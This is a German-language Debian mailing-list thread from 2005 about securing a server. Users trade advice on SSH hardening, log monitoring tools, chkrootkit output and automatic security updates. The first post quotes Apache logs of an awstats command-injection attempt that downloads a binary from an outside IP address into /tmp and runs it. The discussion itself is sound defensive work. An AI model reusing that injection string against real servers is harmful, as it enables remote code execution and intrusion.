Re: Angriff auf server - alles dicht?
Hallo Gerhard, Gerhard Gaussling, 23.12.2005 (d.m.y): Daneben gibt es die üblichen ssh Angriffe, mitden blödsinnigsten Benutzernamen. Root darf sich nicht anmelden, das läuft über sudo/su. Wie habt ihr euren server abgesichert? Der sshd nutzt die libwrap; man kann also in /etc/hosts.allow und /etc/hosts.deny festlegen, welche Netze via SSH zugreifen duerfen. ...ein kleiner Baustein in der Mauer. ;-) Gruss, Christian Schmidt -- Was tun, wenn die Uhr stehen bleibt? Weitergehen, einfach weitergehen! signature.asc Description: Digital signature
Angriff auf server - alles dicht?
Hallo, ich habe einen debian sarge server mit gepatchtem awstats 6.4, dass ich durch .htacess vor unerlaubtem Zugriff schütze. Ich bekomme des öfteren Meldungen wie diese, da war glaube ich auch mal ein linux-wurm dabei. Es scheint mir aber trotz häufiger Versuch nie ein erfolgreichjer Angriff dabei zu sein. Daneben gibt es die üblichen ssh Angriffe, mitden blödsinnigsten Benutzernamen. Root darf sich nicht anmelden, das läuft über sudo/su. Wie habt ihr euren server abgesichert? Ich benutze logcheck - filtern geht hier nicht, da es sich um einen virtuellen server handelt, soll aber ja auch nicht sinnvoll sein, wenn es sich bei dem Rechner nicht um eine explizite Firewall handelt. Womit untersucht ihr, ob der server noch clean ist? ciao Gerhard Hier mal so eine logcheck mail, mit 401 und 404 Fehlern, von dort gehen dann ja wohl keine Gefahren aus (ist ziemlich regelmäßig, dass das versucht wird, genauso wie die ssh Einlog-Versuche): [...] [ip.ip.ip.ip] - - [23/Dec/2005:00:07:15 +0100] GET /cgi-bin/awstats.pl?configdir=| echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 401 479 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) [ip.ip.ip.ip] - - [23/Dec/2005:00:07:19 +0100] GET /cgi-bin/awstats/awstats.pl?configdir=| echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 302 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) [Fri Dec 23 00:07:10 2005] [error] [client 62.4.80.149] File does not exist: /var/www/blogs/xmlsrv/xmlrpc.php [...] [Fri Dec 23 00:07:19 2005] [error] [client 62.4.80.149] script not found or unable to stat: /usr/lib/cgi-bin/awstats [...]
Re: Angriff auf server - alles dicht?
On 23.12.05 12:25:49, Gerhard Gaussling wrote: ich habe einen debian sarge server mit gepatchtem awstats 6.4, dass ich durch .htacess vor unerlaubtem Zugriff schütze. Ich bekomme des öfteren Meldungen wie diese, da war glaube ich auch mal ein linux-wurm dabei. 404 und 401 sind ja nur Meldungen deines Servers, dass die Seiten nicht gefunden wurden. Solange nicht jemand versucht damit ne DOS-Attacke zu fahren... Daneben gibt es die üblichen ssh Angriffe, mitden blödsinnigsten Benutzernamen. Root darf sich nicht anmelden, das läuft über sudo/su. Wie habt ihr euren server abgesichert? Gegen das ssh-Anklopfen hilft den sshd auf nen anderen Port umzuziehen. Das ist genauso sicher/unsicher wie auf Port22 aber das Log wird nicht so zugeschuettet mit den ollen Script-Einbruchsversuchen... Ansonsten laeuft bei mir logwatch und ausser sshd momentan eh nichts weiter auf dem externen NIC. Demnaechst wird Apache angeschaltet, fuers erste wohl nur fuer ein Subversion-Repository. Da wirds dann nur https geben und Zugriff ueber Login. Ich benutze logcheck - filtern geht hier nicht, logcheck produziert mir zuviel Output, da finde ich logwatch besser. Da sieht man immernoch Unregelmaessigkeiten, denke ich, und kann dann bei Bedarf direkt die Logdateien lesen. Beim logcheck-Output weiss ich das ich das nicht lange mitmache den jeden Tag zu lesen... Womit untersucht ihr, ob der server noch clean ist? Bisher gar nicht. Man koennte wohl vllt. so ein checkrootkit-Dingens laufen lassen, mal schauen.. Andreas -- You prefer the company of the opposite sex, but are well liked by your own. -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Angriff auf server - alles dicht?
Am Freitag 23 Dezember 2005 13:15 schrieb Andreas Pakulat: logcheck produziert mir zuviel Output, da finde ich logwatch besser. Da sieht man immernoch Unregelmaessigkeiten, denke ich, und kann dann bei Bedarf direkt die Logdateien lesen. Beim logcheck-Output weiss ich das ich das nicht lange mitmache den jeden Tag zu lesen... Ja, das müsste ich auch mal wieder anpassen/filtern, momentan - nach einem upgrade - kommt scheinbar jeder servwerzugriff durch, das hatte ich schonmal komplett weggefiltert. Jetzt bekomme ich stündlich mails. Früher war ich schon mal auf 1-3x/tag - alle 3 tage runter. logwatch werde ich mir mal ansehen. Womit untersucht ihr, ob der server noch clean ist? Bisher gar nicht. Man koennte wohl vllt. so ein checkrootkit-Dingens laufen lassen, mal schauen.. Hmmm.. da gibtr's auch immer false positives, wobei ich hier nmicht weiß, wie man das wegfiltert (procmail?). /etc/cron.daily/chkrootkit: /usr/lib/cgi-bin/.htaccess You have 1 process hidden for readdir command You have 1 process hidden for ps command SIGINVISIBLE Adore found Warning: Possible LKM Trojan installed /proc/1/fd: Permission denied eth0:vserver821: PACKET SNIFFER((null)[(null)], (null)[(null)]) Letzte Zeile kann ich nicht einschätzen, aber Adore/LKM ist ein false positive. Diese null/null Geschichte ist irgendwann aufgetaucht, hängt aber glaube ich mit einem upgrade/installation zusammen. Apropos Sicherheit: Wie sieht euer cronjob für ein dist-upgrade aus? Ich mache das momentan noch von Hand. Da kommt es natürlich des öfteren vor, das ein wichtiges Sicherheits Update erst eine Woche später eingespielt wird. tripwire etc. ist wohl mit Kanonen auf Spatzen geschossen, oder? Eine automatische Backuplösung wäre natürlich auch noch wichtig... aber das ein anderes mal. ciao Gerhard
Re: Angriff auf server - alles dicht?
On 23.12.05 13:46:09, Gerhard Gaußling wrote: Apropos Sicherheit: Wie sieht euer cronjob für ein dist-upgrade aus? Ich mache das momentan noch von Hand. Da kommt es natürlich des öfteren vor, das ein wichtiges Sicherheits Update erst eine Woche später eingespielt wird. Ich wollte mir mal cron-apt oder apticron anschauen, bin nur noch nicht dazu gekommen. Damit kriegst du dann immer ne Mail wenn updates anstehen. Andreas -- Your boyfriend takes chocolate from strangers. -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Angriff auf server - alles dicht?
Andreas Pakulat wrote: On 23.12.05 13:46:09, Gerhard Gaußling wrote: Apropos Sicherheit: Wie sieht euer cronjob für ein dist-upgrade aus? Ich mache das momentan noch von Hand. Da kommt es natürlich des öfteren vor, das ein wichtiges Sicherheits Update erst eine Woche später eingespielt wird. Ich wollte mir mal cron-apt oder apticron anschauen, bin nur noch nicht dazu gekommen. Damit kriegst du dann immer ne Mail wenn updates anstehen. Apticron funktioniert bei mir sehr gut. Installieren und fertig. Paul -- Linux-User #271918 with the Linux Counter, http://counter.li.org/ signature.asc Description: OpenPGP digital signature
Re: Angriff auf server - alles dicht?
On 23.12.05 15:02:13, Paul Puschmann wrote: Andreas Pakulat wrote: On 23.12.05 13:46:09, Gerhard Gaußling wrote: Apropos Sicherheit: Wie sieht euer cronjob für ein dist-upgrade aus? Ich mache das momentan noch von Hand. Da kommt es natürlich des öfteren vor, das ein wichtiges Sicherheits Update erst eine Woche später eingespielt wird. Ich wollte mir mal cron-apt oder apticron anschauen, bin nur noch nicht dazu gekommen. Damit kriegst du dann immer ne Mail wenn updates anstehen. Apticron funktioniert bei mir sehr gut. Installieren und fertig. Will aber iproute und libatm1 installieren, dann lieber cron-apt das hat keine weiteren Abhaengigkeiten. Andreas -- Don't get to bragging. -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
